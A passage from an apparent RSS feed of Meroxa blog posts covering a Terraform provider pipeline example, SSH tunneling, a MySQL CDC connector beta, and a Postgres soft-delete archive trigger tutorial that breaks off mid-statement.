&lt;p&gt;To get started with the Meroxa Terraform Provider, require it within your&lt;a href=&quot;https://www.terraform.io/docs/language/providers/requirements.html&quot;&gt;Terraform File&lt;/a&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;hcl&quot;&gt;&lt;pre class=&quot;language-hcl&quot;&gt;&lt;code class=&quot;language-hcl&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;terraform&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;required_providers&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;meroxa&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;version&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1.0&quot;&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;source&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;meroxa.io/meroxa/meroxa&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, you can define your Meroxa resources within this Terraform project.&lt;/p&gt;
&lt;p&gt;For example, here is an example pipeline that can assist with migration from PostgreSQL to Mongo. It sets up a pipeline keep both databases in sync in real-time:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;hcl&quot;&gt;&lt;pre class=&quot;language-hcl&quot;&gt;&lt;code class=&quot;language-hcl&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# Require Provider &lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;terraform&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;required_providers&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;meroxa&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;version&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;0.1&quot;&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;source&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;meroxa.io/meroxa/meroxa&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# Configure Provider&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;provider&lt;span class=&quot;token type variable&quot;&gt; &quot;meroxa&quot; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;access_token&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; var.access_token &lt;span class=&quot;token comment&quot;&gt;# optionally use MEROXA_ACCESS_TOKEN env var&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# Define Pipeline&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;resource &lt;span class=&quot;token type variable&quot;&gt;&quot;meroxa_pipeline&quot;&lt;/span&gt;&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;pipeline&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;name&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;sync-postgres-mongo&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# Configure Postgres Resource&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;resource &lt;span class=&quot;token type variable&quot;&gt;&quot;meroxa_resource&quot;&lt;/span&gt;&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;name&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;my-postgres&quot;&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;type&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres&quot;&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;url&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;POSTGRES_CONNECTION_URL&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# Configure MongoDB Resource&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;resource &lt;span class=&quot;token type variable&quot;&gt;&quot;meroxa_resource&quot;&lt;/span&gt;&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;mongo&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;name&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;my-mongo&quot;&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;type&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;mongodb&quot;&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;url&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;MONGO_CONNECTION_URL&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# The PostgreSQL connector will capture CDC events for &lt;/span&gt;
&lt;span class=&quot;token comment&quot;&gt;# every insert, update and delete operation from a Postgres table.&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;resource &lt;span class=&quot;token type variable&quot;&gt;&quot;meroxa_connector&quot;&lt;/span&gt;&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;source&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;name&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;from-postgres&quot;&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;source_id&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; meroxa_resource.postgres.id
  &lt;span class=&quot;token property&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;User&quot;&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;pipeline_id&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; meroxa_pipeline.pipeline.id
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# The MongoDB connector will send data to a collection within MongoDB.&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;resource &lt;span class=&quot;token type variable&quot;&gt;&quot;meroxa_connector&quot;&lt;/span&gt;&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;destination&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;name&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;to-mongo&quot;&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;destination_id&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; meroxa_resource.mongo.id
  &lt;span class=&quot;token property&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; meroxa_connector.source.streams&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;.output&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;pipeline_id&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; meroxa_pipeline.pipeline.id
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once you’ve defined your pipeline, you can use the&lt;a href=&quot;https://www.terraform.io/docs/cli/commands/index.html&quot;&gt;Terraform CLI&lt;/a&gt; to create, update, and destroy your Meroxa Resources.&lt;/p&gt;
&lt;p&gt;Within the Meroxa Terraform Provider Documentation, you can view all the different configuration options for each resource type.&lt;/p&gt;
&lt;p&gt;As always,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If you need help, reach out to&lt;a href=&quot;mailto:support@meroxa.io&quot;&gt;support@meroxa.io&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Join our&lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; community.&lt;/li&gt;
&lt;li&gt;Follow us on&lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt; and&lt;a href=&quot;http://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I can’t wait to see what you build 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Securely Communicate to Your Resources With SSH Tunneling]]></title><description><![CDATA[When you build a data pipeline using Meroxa, your data is encrypted in transit and at rest. Today’s platform update adds a new layer of security to Meroxa.]]></description><link>https://meroxa.com/blog/securely-communicate-to-your-resources-with-ssh-tunneling</link><guid isPermaLink="false">https://meroxa.com/blog/securely-communicate-to-your-resources-with-ssh-tunneling</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Thu, 15 Jul 2021 15:30:00 GMT</pubDate><content:encoded>&lt;p&gt;Data security is at the core of the Meroxa platform. When you build a data pipeline using Meroxa, your data is encrypted in transit and at rest. Today’s platform update adds a new layer of security to Meroxa.&lt;/p&gt;
&lt;p&gt;SSH Tunneling is now in public beta.&lt;/p&gt;
&lt;p&gt;With SSH Tunneling, you gain the ability to securely communicate between resources that are not publicly available over the Internet. Tunneling is supported for both sources and destinations.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*OEvGgFwEHfYXpvWmj5P8oA.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Getting Started&lt;/h3&gt;
&lt;p&gt;To get started with SSH Tunneling, when you&lt;a href=&quot;https://docs.meroxa.com/cli/cmd/meroxa-resources-create&quot;&gt;create a resource&lt;/a&gt; via the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;, provide the new&lt;code class=&quot;language-text&quot;&gt;[\--ssh-url](https://docs.meroxa.com/cli/cmd/meroxa-resources-create)&lt;/code&gt; option.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*CeahNACvO3BrLgHQ_mgfOw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;This new option allows you to point to a bastion host that will be used for the resource connection. Typically, this host is publicly available to a fixed list of &lt;a href=&quot;https://docs.meroxa.com/platform/networking/meroxa-ips&quot;&gt;IP addresses&lt;/a&gt; and has access to resources that are not available to the public.&lt;/p&gt;
&lt;p&gt;After creation, Meroxa will provide a public key you can add to your bastion host environment. Then, you can immediately start building real-time pipelines.&lt;/p&gt;
&lt;p&gt;I can’t wait to see what you build 🚀&lt;/p&gt;
&lt;p&gt;As always,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If you need help, reach out to&lt;a href=&quot;mailto:support@meroxa.io&quot;&gt;support@meroxa.io&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Join our&lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; community.&lt;/li&gt;
&lt;li&gt;Follow us on&lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Introducing MySQL Connector Beta]]></title><description><![CDATA[MySQL, one of the most popular open-source databases for developers, is now in public beta as a source and destination for real-time data streams.]]></description><link>https://meroxa.com/blog/introducing-mysql-connector-beta</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-mysql-connector-beta</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Tue, 29 Jun 2021 15:25:00 GMT</pubDate><content:encoded>&lt;h3&gt;Real-time MySQL Change Data Capture (CDC) and ingestion&lt;/h3&gt;
&lt;p&gt;Meroxa is committed to making real-time data engineering simple. Part of this is giving you access to the databases engineers use most. Today, we’re happy to announce that MySQL, one of the most popular open-source databases for developers, is now in public beta as a source and destination for real-time data streams.&lt;/p&gt;
&lt;p&gt;As a source, you can build pipelines that act on changes from MySQL. For example, you can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Extract Transform Load (ETL) into a Data Warehouse.&lt;/li&gt;
&lt;li&gt;Keep a search index up-to-date.&lt;/li&gt;
&lt;li&gt;Replicate data to another database.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As a destination, you can capture events from &lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;PostgreSQL&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/platform/resources/elasticsearch&quot;&gt;Elasticsearch&lt;/a&gt;, or &lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview&quot;&gt;any other Meroxa source&lt;/a&gt; and send them to &lt;a href=&quot;https://docs.meroxa.com/platform/resources/mysql/setup&quot;&gt;MySQL&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;With Meroxa, it’s all streaming, real-time, and your pipelines will be up and running in minutes, not months.&lt;/p&gt;
&lt;h3&gt;Getting Started&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/0*WTlgjH5ZZ9gn5rbR&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;To begin sending data to MySQL, perform the following steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;http://dashboard.meroxa.io/&quot;&gt;Create an Account&lt;/a&gt; — Create an account using the&lt;a href=&quot;http://dashboard.meroxa.io/&quot;&gt;dashboard&lt;/a&gt; or the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa&lt;/a&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;CLI&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/mysql/setup&quot;&gt;Setup&lt;/a&gt; — Setup your MySQL instance and acquire the credentials needed to talk to Meroxa.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview#create-a-resource&quot;&gt;Add Resource&lt;/a&gt; — Use the&lt;a href=&quot;https://dashboard.meroxa.io/resources/new&quot;&gt;dashboard&lt;/a&gt; or&lt;code class=&quot;language-text&quot;&gt;[meroxa resource create](https://docs.meroxa.com/platform/resources/overview#create-a-resource-1)&lt;/code&gt; command to add to your Meroxa Resource Catalog.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Then, you can start building pipelines.&lt;/p&gt;
&lt;h3&gt;MySQL Source Connector&lt;/h3&gt;
&lt;p&gt;As a source, you can capture changes from MySQL and send them to&lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-redshift&quot;&gt;Redshift&lt;/a&gt;, Webhooks, &lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-s3&quot;&gt;Amazon S3&lt;/a&gt;, or &lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview&quot;&gt;any other destination&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The MySQL source is a CDC connector that leverages&lt;a href=&quot;https://dev.mysql.com/doc/refman/8.0/en/binary-log.html&quot;&gt;MySQL’s Binary Log&lt;/a&gt;. The binary log contains a list of every change event of a given MySQL instance. This connector will perform an initial snapshot of the data. Then, it will stream every&lt;code class=&quot;language-text&quot;&gt;INSERT&lt;/code&gt;,&lt;code class=&quot;language-text&quot;&gt;UPDATE&lt;/code&gt;,&lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt; operation and push the events into a Meroxa stream.&lt;/p&gt;
&lt;p&gt;This connector will emit data records in the following format:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/0*7P-pYmR1oAE7Ph-T&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;To create a source, you can use the&lt;a href=&quot;https://dashboard.meroxa.io/resources/new&quot;&gt;dashboard&lt;/a&gt; or &lt;code class=&quot;language-text&quot;&gt;[meroxa connector create](https://docs.meroxa.com/platform/resources/overview#create-a-resource-1)&lt;/code&gt; command to create a new connector:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa connector create from-mysql-connector &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--from&lt;/span&gt; my-mysql &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--input&lt;/span&gt; Users &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--pipeline&lt;/span&gt; my-pipeline&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For more, see&lt;a href=&quot;https://docs.meroxa.com/platform/resources/mysql/setup&quot;&gt;MySQL Source Connector Documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;MySQL Destination Connector&lt;/h3&gt;
&lt;p&gt;As a destination, you can capture events from a Meroxa source and send them to tables in MySQL.&lt;/p&gt;
&lt;p&gt;To create a destination, you can use the&lt;a href=&quot;https://dashboard.meroxa.io/resources/new&quot;&gt;dashboard&lt;/a&gt; or&lt;code class=&quot;language-text&quot;&gt;[meroxa connector create](https://docs.meroxa.com/platform/resources/overview#create-a-resource-1)&lt;/code&gt; command to create a new connector:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa connector create to-mysql-connector &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--from&lt;/span&gt; my-mysql &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--input&lt;/span&gt; &lt;span class=&quot;token variable&quot;&gt;$STREAM_NAME&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--pipeline&lt;/span&gt; my-pipeline&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For more, see&lt;a href=&quot;https://docs.meroxa.com/platform/resources/mysql/setup&quot;&gt;MySQL Connector Documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I can’t wait to see what you build. 🚀&lt;/p&gt;
&lt;p&gt;&lt;em&gt;The MySQL connector is currently in beta. We encourage customers to start using the connector in their staging and development environments and provide feedback. Following the beta phase, we will make the connector generally available for use in all environments (dev, staging, and production). Meroxa follows this pattern for all connectors that it releases to ensure a great experience for you.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;As always,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If you need help, reach out to&lt;a href=&quot;mailto:support@meroxa.io&quot;&gt;support@meroxa.io&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Join our&lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; community.&lt;/li&gt;
&lt;li&gt;Follow us on&lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Creating a Soft Delete Archive Table with PostgreSQL]]></title><description><![CDATA[Postgres Triggers and Functions are powerful features that allow you to listen for DELETE operations that occur within a table and insert the deleted row in a separate archive table.]]></description><link>https://meroxa.com/blog/creating-a-soft-delete-archive-table-with-postgresql</link><guid isPermaLink="false">https://meroxa.com/blog/creating-a-soft-delete-archive-table-with-postgresql</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Tue, 08 Jun 2021 20:01:00 GMT</pubDate><content:encoded>&lt;p&gt;Streaming from Postgres’ Logical replication log is the most efficient means of capturing changes with the least amount of overhead to your database. However, in some environments (i.e., unsupported versions, Heroku Postgres), you’re left with polling the database to monitor changes.&lt;/p&gt;
&lt;p&gt;Typically when&lt;a href=&quot;https://docs.meroxa.com/docs/sources/postgres/connection-types/polling&quot;&gt;polling PostgreSQL&lt;/a&gt; to capture data changes, you can track the max value of a primary key (id) to know when an&lt;code class=&quot;language-text&quot;&gt;INSERT&lt;/code&gt; operation occurred. Additionally, if your database has an&lt;code class=&quot;language-text&quot;&gt;updateAt&lt;/code&gt; column, you can look at timestamp changes to capture&lt;code class=&quot;language-text&quot;&gt;UPDATE&lt;/code&gt; operations, but it’s much harder to capture&lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt; operations.&lt;/p&gt;
&lt;p&gt;Postgres&lt;a href=&quot;https://www.postgresql.org/docs/9.1/sql-createtrigger.html&quot;&gt;Triggers&lt;/a&gt; and&lt;a href=&quot;https://www.postgresql.org/docs/9.1/sql-createfunction.html&quot;&gt;Functions&lt;/a&gt; are powerful features of Postgres that allow you to listen for&lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt; operations that occur within a table and insert the deleted row in a separate archive table. You can consider this a method of performing&lt;a href=&quot;https://en.wiktionary.org/wiki/soft_deletion&quot;&gt;soft deletes&lt;/a&gt;, and this model is helpful to maintain the records for historical or analytical purposes or data recovery purposes.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1120/1*4E8HnHt7jmYlIBq16Jij1A.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the commands below, we capture deletes from a table called&lt;code class=&quot;language-text&quot;&gt;User&lt;/code&gt;, and the trigger will insert the deleted row into a table called&lt;code class=&quot;language-text&quot;&gt;Deleted_User&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Step One: Create a new table&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;If you don’t have a table yet, you’ll need to create one. To help, you can easily copy an origin table:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TABLE&lt;/span&gt; “Deleted_User” &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TABLE&lt;/span&gt; “&lt;span class=&quot;token keyword&quot;&gt;User&lt;/span&gt;” &lt;span class=&quot;token keyword&quot;&gt;WITH&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;NO&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;DATA&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt;:&lt;code class=&quot;language-text&quot;&gt;WITH NO DATA&lt;/code&gt; allows you to copy a table’s structure without data.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Step Two: Create a new Postgres Function&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Next, we can create a new function named&lt;code class=&quot;language-text&quot;&gt;moveDeleted()&lt;/code&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;FUNCTION&lt;/span&gt; moveDeleted&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;RETURNS&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;trigger&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; $$
	&lt;span class=&quot;token keyword&quot;&gt;BEGIN&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;INSERT&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;INTO&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Deleted_User&quot;&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;VALUES&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;OLD&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;RETURN&lt;/span&gt; OLD&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;END&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
$$ &lt;span class=&quot;token keyword&quot;&gt;LANGUAGE&lt;/span&gt; plpgsql&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here we are using&lt;code class=&quot;language-text&quot;&gt;VALUES((OLD).*)&lt;/code&gt; to send every column to the archive table, but you may update this to omit or even add new columns.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Step Three: Create a new Postgres Trigger&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Lastly, we can create a Postgres Trigger named&lt;code class=&quot;language-text&quot;&gt;moveDeleted&lt;/code&gt;that calls the&lt;code class=&quot;language-text&quot;&gt;moveDeleted()&lt;/code&gt; function:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TRIGGER&lt;/span&gt; moveDeleted
BEFORE &lt;span class=&quot;token keyword&quot;&gt;DELETE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;ON&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;User&quot;&lt;/span&gt;
